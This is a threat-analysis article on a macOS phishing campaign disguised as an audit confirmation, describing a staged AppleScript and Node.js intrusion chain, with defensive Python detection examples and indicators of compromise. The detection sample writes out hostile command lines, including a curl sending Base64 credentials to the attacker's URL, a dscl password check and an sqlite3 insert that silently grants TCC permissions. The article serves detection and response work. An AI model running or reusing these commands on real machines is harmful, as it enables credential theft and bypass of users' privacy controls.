Recently, Chainbase Labs detected and captured a phishing email campaign disguised as "audit/compliance confirmation," and shared the de-identified malicious sample with the SlowMist security team. The two parties jointly investigated and analyzed the malicious sample.
Author: Yao
Editor: 77
Background
Attackers first coax the recipient into replying to a request to "confirm the company's legal English name," then follow up with references to an "FY2025 external audit" and a "Token Vesting Confirmation deadline," attaching malicious files posing as Word/PDF documents. The social-engineering pretext gets the victim to open the attachment and follow its on-screen instructions, which is where credentials and sensitive data are stolen.


Trojan Analysis
The captured campaign is a targeted attack on macOS that combines social engineering with a multi-stage, largely fileless payload (several stages run only in memory or from temporary files). Using the "audit/compliance" business pretext as the initial entry point, the attackers deliver a disguised AppleScript, try to obtain privacy-sensitive permissions by tricking the user into entering their password and by tampering with TCC, and finally stand up a Node.js-based remote-control environment on the victim's machine.
The email attachment is named "Confirmation_Token_Vesting.docx.scpt": a compiled AppleScript (.scpt) disguised as a Word document by means of a double extension.
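The double-extension trick can be caught before anyone double-clicks it. The following is an added example (not SlowMist or Chainbase tooling) of a small attachment triage check: it flags names where a document extension is followed by a script extension, and independently checks the file header for the "FasdUAS" magic that compiled AppleScript files begin with, so a script renamed to a plain ".docx" is caught as a content/extension mismatch. The sample files it writes are constructed stand-ins containing only that header, not the real malware.

```python
"""Triage mail attachments for the disguise used in this campaign.

Added example; the sample files below are constructed and harmless.
"""
import os
import tempfile

# Compiled AppleScript (.scpt) files start with this magic string.
APPLESCRIPT_MAGIC = b"FasdUAS"
DOC_EXTS = {".docx", ".doc", ".pdf", ".xlsx", ".pptx", ".txt"}
SCRIPT_EXTS = {".scpt", ".scptd", ".applescript", ".sh", ".command"}


def split_exts(name):
    """All extensions of a file name, lower-cased: 'a.docx.scpt' -> ['.docx', '.scpt']."""
    parts = os.path.basename(name).split(".")
    return ["." + p.lower() for p in parts[1:]]


def triage_attachment(path):
    """Return a list of findings (strings) for one attachment; empty means clean."""
    findings = []
    exts = split_exts(path)
    # Name-based check: document extension immediately followed by a script extension.
    if len(exts) >= 2 and exts[-1] in SCRIPT_EXTS and exts[-2] in DOC_EXTS:
        findings.append("double-extension: document name ending in %s" % exts[-1])
    elif exts and exts[-1] in SCRIPT_EXTS:
        findings.append("script attachment %s" % exts[-1])
    # Content-based check: does the header say this is compiled AppleScript?
    with open(path, "rb") as f:
        head = f.read(len(APPLESCRIPT_MAGIC))
    if head.startswith(APPLESCRIPT_MAGIC):
        findings.append("compiled AppleScript magic (FasdUAS) in header")
        if exts and exts[-1] in DOC_EXTS:
            findings.append("content/extension mismatch: AppleScript with document extension")
    return findings


def build_samples(dirpath):
    """Write constructed sample files and return {name: path}."""
    samples = {
        # the campaign's naming pattern, with only the AppleScript header inside
        "Confirmation_Token_Vesting.docx.scpt": APPLESCRIPT_MAGIC + b" 1.101.10\x00\x00",
        # a benign PDF header
        "Q3_report.pdf": b"%PDF-1.7\n",
        # AppleScript header hidden behind a plain document extension
        "notes.docx": APPLESCRIPT_MAGIC + b" 1.101.10",
    }
    paths = {}
    for name, content in samples.items():
        p = os.path.join(dirpath, name)
        with open(p, "wb") as f:
            f.write(content)
        paths[name] = p
    return paths


def demo():
    """Triage the constructed samples and return {name: findings}."""
    with tempfile.TemporaryDirectory() as d:
        return {name: triage_attachment(p) for name, p in build_samples(d).items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or "clean")
```

Both checks are deliberately independent: the name check works on a mail gateway that never opens the file, while the header check survives a rename to a single, innocuous extension.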

Decoding the script showed that the first-stage AppleScript is a downloader whose job is to fetch and run the next stage. It does three things:

1. Opens System Settings and switches to the "Software Update" pane, so the user believes the system is applying an update or repair.
2. Collects system information (CPU architecture, i.e. Intel or Apple Silicon; macOS version; system language; and so on) and sends it to the server, which uses it to choose the payload to return.
3. Downloads a script from the suspicious domain sevrrhst[.]com, executes it, and then cleans up its traces.

Decoding the downloaded script confirmed a second malicious AppleScript capable of credential theft, TCC permission tampering, and remote command execution.

Main behaviors of the second-stage script:
1. Fake progress bar
The script first displays a fake progress-bar window claiming to be "fixing system update issues" or "resolving document viewer issues".
2. Phishing pop-up
While the progress bar runs, it shows a convincing system-style permission/password dialog (styled as a System Settings prompt, including a Google avatar element):
Password theft: when the user enters a password and clicks "OK", the script calls the dscl command to check whether the password is correct.
Exfiltration: as soon as the check succeeds, it Base64-encodes the collected username and password and sends them to sevrrhst[.]com with curl.
3. Bypassing TCC restrictions
The script attempts to modify macOS's TCC (Transparency, Consent, and Control) privacy database directly.
Directory spoofing: it renames the directory that holds the TCC database (com.apple.TCC) in an attempt to sidestep the system's protection of that database.
Silent authorization: it inserts rows into the database with SQL statements, granting itself (and Bash, Terminal, and Script Editor) the following permissions without the user's knowledge:
File access permissions: Downloads, Documents, Desktop, removable volumes, etc.
Privacy/control permissions: camera, screen recording, keyboard event monitoring, accessibility, etc.
4. Backdoor channel: it downloads an encrypted blob named "origin", decodes and executes it, and opens a channel to the server through which remote commands are received and run by Bash.
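Because the grants are written straight into the database, they can also be read straight back out of it during triage. The following is an added example (not SlowMist or Chainbase code) that audits a TCC.db for exactly the pattern described above: high-value services allowed to shell, Terminal, or Script Editor clients. The `access` table it creates is a simplified subset of the real schema (the real table has further columns such as `csreq`), and the rows are constructed; on a live Mac you would open `~/Library/Application Support/com.apple.TCC/TCC.db` read-only instead, which requires the terminal to hold Full Disk Access.

```python
"""Audit a TCC.db for silent grants to shell/terminal/script clients.

Added example. The schema is a simplified subset of the real `access` table
and the rows are constructed to mimic the tampering described in the article.
"""
import sqlite3

ALLOWED = 2  # auth_value: 0 = denied, 2 = allowed

# Clients the script grants permissions to, by bundle id or absolute path.
SUSPICIOUS_CLIENTS = {
    "/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/osascript",
    "com.apple.Terminal", "com.apple.ScriptEditor2",
}

# The folder and privacy services named in the analysis.
HIGH_VALUE_SERVICES = {
    "kTCCServiceSystemPolicyDownloadsFolder", "kTCCServiceSystemPolicyDocumentsFolder",
    "kTCCServiceSystemPolicyDesktopFolder", "kTCCServiceSystemPolicyRemovableVolumes",
    "kTCCServiceCamera", "kTCCServiceScreenCapture",
    "kTCCServiceListenEvent", "kTCCServiceAccessibility",
}

SCHEMA = """
CREATE TABLE access (
  service TEXT NOT NULL,
  client TEXT NOT NULL,
  client_type INTEGER NOT NULL,   -- 0 = bundle id, 1 = absolute path
  auth_value INTEGER NOT NULL,
  auth_reason INTEGER NOT NULL,
  auth_version INTEGER NOT NULL,
  last_modified INTEGER NOT NULL  -- unix time
);
"""


def audit_tcc(conn):
    """Return (service, client, last_modified) for allowed grants of a
    high-value service to a shell/terminal/script client, newest first."""
    rows = conn.execute(
        "SELECT service, client, last_modified FROM access "
        "WHERE auth_value = ? ORDER BY last_modified DESC", (ALLOWED,))
    return [(s, c, t) for s, c, t in rows
            if c in SUSPICIOUS_CLIENTS and s in HIGH_VALUE_SERVICES]


def build_sample_db():
    """Constructed in-memory database resembling a tampered user TCC.db."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    rows = [
        # a grant made through the normal consent prompt; should not be reported
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 2, 1, 1700000000),
        # rows the script injected for itself and its helpers
        ("kTCCServiceScreenCapture", "/bin/bash", 1, 2, 2, 1, 1769212800),
        ("kTCCServiceAccessibility", "com.apple.Terminal", 0, 2, 2, 1, 1769212800),
        ("kTCCServiceListenEvent", "com.apple.ScriptEditor2", 0, 2, 2, 1, 1769212800),
        ("kTCCServiceSystemPolicyDownloadsFolder", "/bin/bash", 1, 2, 2, 1, 1769212800),
        # a denied entry for a shell: not a grant, should not be reported
        ("kTCCServiceCamera", "/bin/bash", 1, 0, 2, 1, 1769212800),
    ]
    conn.executemany("INSERT INTO access VALUES (?,?,?,?,?,?,?)", rows)
    conn.commit()
    return conn


if __name__ == "__main__":
    for service, client, ts in audit_tcc(build_sample_db()):
        print("%-42s %-28s %d" % (service, client, ts))
```

A cluster of grants sharing one `last_modified` timestamp, all pointing at command-line clients, is the tell: real consent dialogs produce one row at a time, spread over days. The same timestamp also gives a responder the time of compromise to pivot on.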

After the Node.js runtime has been staged, the script makes a further request (req=skip) to fetch the core script index.js and launches it.

index.js collects and reports system version, CPU, disk, network, and process information; the server then returns new script code chosen on the basis of that report, which the sample executes dynamically with eval. Functionality can therefore be extended on demand without ever writing a new binary to disk.
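Taken together, the chain above has a distinctive process-level shape: an osascript process that spawns `dscl -authonly`, a curl with a Base64 body to an unfamiliar host, direct writes to TCC.db, and a node process running from a hidden directory. The following is an added example (not SlowMist or Chainbase code) of detection logic run over process-execution events of the kind an EDR or Endpoint Security client records. The event stream is constructed; the C2 URL is taken from the IOC list, while the credential pair, the hidden directory `/Users/alice/.env_arm`, and the exact command lines are assumptions for illustration.

```python
"""Detect the behaviour chain of this campaign from process-execution events.

Added example. Events are dicts with pid, ppid, exe (full path) and argv.
The sample events are constructed; the C2 URL comes from the IOC list.
"""
import base64
import re

C2_URL = "https://sevrrhst.com/inc/register.php"


def _ancestry(by_pid, pid):
    """Executable paths of the given process and its ancestors (loop-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["exe"])
        pid = by_pid[pid]["ppid"]
    return chain


def _looks_base64(s):
    return (len(s) >= 8 and len(s) % 4 == 0
            and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) is not None)


def detect(events):
    """Return a list of (rule, pid) alerts, in event order."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        exe, argv = e["exe"], e["argv"]
        name = exe.rsplit("/", 1)[-1]
        from_script = "/usr/bin/osascript" in _ancestry(by_pid, e["ppid"])
        joined = " ".join(argv)
        # 1. Password check: the fake dialog's input is verified with dscl -authonly.
        if name == "dscl" and "-authonly" in argv and from_script:
            alerts.append(("dscl-authonly-from-applescript", e["pid"]))
        # 2. Exfiltration: curl from the script with a Base64 request body.
        if name == "curl" and from_script:
            for flag in ("-d", "--data", "--data-binary"):
                if flag in argv and argv.index(flag) + 1 < len(argv):
                    if _looks_base64(argv[argv.index(flag) + 1]):
                        alerts.append(("curl-base64-exfil", e["pid"]))
                    break
        # 3. TCC tampering: direct SQL against TCC.db, or renaming its directory.
        if name == "sqlite3" and "com.apple.TCC/TCC.db" in joined:
            alerts.append(("tcc-db-direct-write", e["pid"]))
        if name == "mv" and any(a.rstrip("/").endswith("com.apple.TCC") for a in argv):
            alerts.append(("tcc-dir-rename", e["pid"]))
        # 4. Staged runtime: node launched from a hidden (dot-prefixed) directory.
        if name == "node" and any(p.startswith(".") for p in exe.split("/")[1:-1]):
            alerts.append(("node-from-hidden-dir", e["pid"]))
    return alerts


def build_sample_events():
    """Constructed event stream: the decoded second stage running under osascript,
    followed by benign activity from an interactive shell that must not alert."""
    tcc_dir = "/Users/alice/Library/Application Support/com.apple.TCC"
    creds = base64.b64encode(b"alice:hunter2").decode()  # assumed exfil body format
    return [
        {"pid": 500, "ppid": 1, "exe": "/usr/bin/osascript",
         "argv": ["osascript", "Confirmation_Token_Vesting.docx.scpt"]},
        {"pid": 501, "ppid": 500, "exe": "/bin/sh",
         "argv": ["sh", "-c", "dscl . -authonly alice hunter2"]},
        {"pid": 502, "ppid": 501, "exe": "/usr/bin/dscl",
         "argv": ["dscl", ".", "-authonly", "alice", "hunter2"]},
        {"pid": 503, "ppid": 500, "exe": "/usr/bin/curl",
         "argv": ["curl", "-s", "-d", creds, C2_URL]},
        {"pid": 504, "ppid": 500, "exe": "/bin/mv",
         "argv": ["mv", tcc_dir, tcc_dir + ".bak"]},
        {"pid": 505, "ppid": 500, "exe": "/usr/bin/sqlite3",
         "argv": ["sqlite3", tcc_dir + "/TCC.db",
                  "INSERT INTO access (service, client, auth_value) "
                  "VALUES ('kTCCServiceScreenCapture', '/bin/bash', 2)"]},
        {"pid": 506, "ppid": 500, "exe": "/Users/alice/.env_arm/bin/node",
         "argv": ["node", "index.js"]},
        # benign: a developer posting Base64 data and running node from a normal path
        {"pid": 600, "ppid": 1, "exe": "/bin/zsh", "argv": ["-zsh"]},
        {"pid": 601, "ppid": 600, "exe": "/usr/bin/curl",
         "argv": ["curl", "-d", creds, "https://api.example.test/login"]},
        {"pid": 602, "ppid": 600, "exe": "/usr/local/bin/node", "argv": ["node", "app.js"]},
    ]


if __name__ == "__main__":
    for rule, pid in detect(build_sample_events()):
        print("%-32s pid=%d" % (rule, pid))
```

The parent-chain requirement on rules 1 and 2 is what keeps the benign curl in the sample from firing: Base64 POST bodies are common, but a curl whose ancestor is osascript is not. Rules 3 and 4 are not conditioned on the parent, because a write to TCC.db by sqlite3 or a node binary under a dot-directory deserves a look whatever launched it.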
Malicious Domain Analysis
According to threat-intelligence platform queries, sevrrhst[.]com was registered on January 23, 2026 and uses a free certificate: the profile of disposable, short-lived attack infrastructure. It resolves to the IP address 88.119.171.59.

Further investigation found the same IP address associated with more than 10 similar malicious domains, including tattomc[.]com and stomcs[.]com.


Summary
This sample is not a single information stealer but a staged intrusion chain: AppleScript first drives the user interaction, steals credentials, and attempts to escalate permissions; Node.js (index.js) then provides a remote-control framework whose capabilities are extended dynamically. Its hallmarks are "abuse of legitimate tools + dynamic code delivery and execution," which leaves detection strategies that depend on static signatures with little to match on.
Suggestions:
1. If you have opened an email attachment/script and executed it (or have already entered your system password), disconnect from the network immediately; only after evidence collection, isolation, and backup/transfer of critical assets should you take further action.
2. Infected users should run `tccutil reset All` to clear the TCC entries and remove the permissions the Trojan granted itself. Do this only after the malicious processes have been stopped, or they can simply re-insert the grants; because the script also renames the com.apple.TCC directory, check ~/Library/Application Support for a renamed copy as well. Expect legitimate apps to prompt for their permissions again afterwards.
3. Terminate the malicious processes, including the Node.js processes running from hidden directories, and remove the staged runtime and script files.
About Chainbase Labs
Chainbase Labs is redefining data, making it a truly important financial asset in the AI era. By building a super data network, Chainbase transforms various signals scattered across the blockchain into structured, verifiable data, making it directly usable by AI models, autonomous agents, and various decentralized applications.
To date, the Chainbase network covers more than 200 blockchains, has processed over 500 billion data requests, and supports a community of more than 35,000 developers. Currently, over 10,000 projects are using Chainbase, with applications spanning a wide range of scenarios, including security infrastructure, L2 block explorers, smart agent protocols, and on-chain data analytics.
IOC
filename: Confirmation_Token_Vesting.docx.scpt
SHA256:
3e4d35903c51db3da8d4bd77491b5c181b7361aaf152609d03a1e2bb86faee43
filename: env_arm.zip
SHA256:
f9e0376114c57d659025ceb46f1ef48aa80b8af5909b2de0cf80e88040fef345
filename: index.js
SHA256:
0f1e457488fe799dee7ace7e1bc2df4c1793245f334a4298035652ebeb249414
URL:
https://sevrrhst[.]com/css/controller.php
https://sevrrhst[.]com/inc/register.php
C2: sevrrhst[.]com
IP: 88.119.171.59
Disclaimer: As a blockchain information platform, the articles published on this site represent only the personal views of the authors and guests and do not reflect the position of Web3Caff. The information contained in the articles is for reference only and does not constitute any investment advice or offer. Please comply with the relevant laws and regulations of your country or region.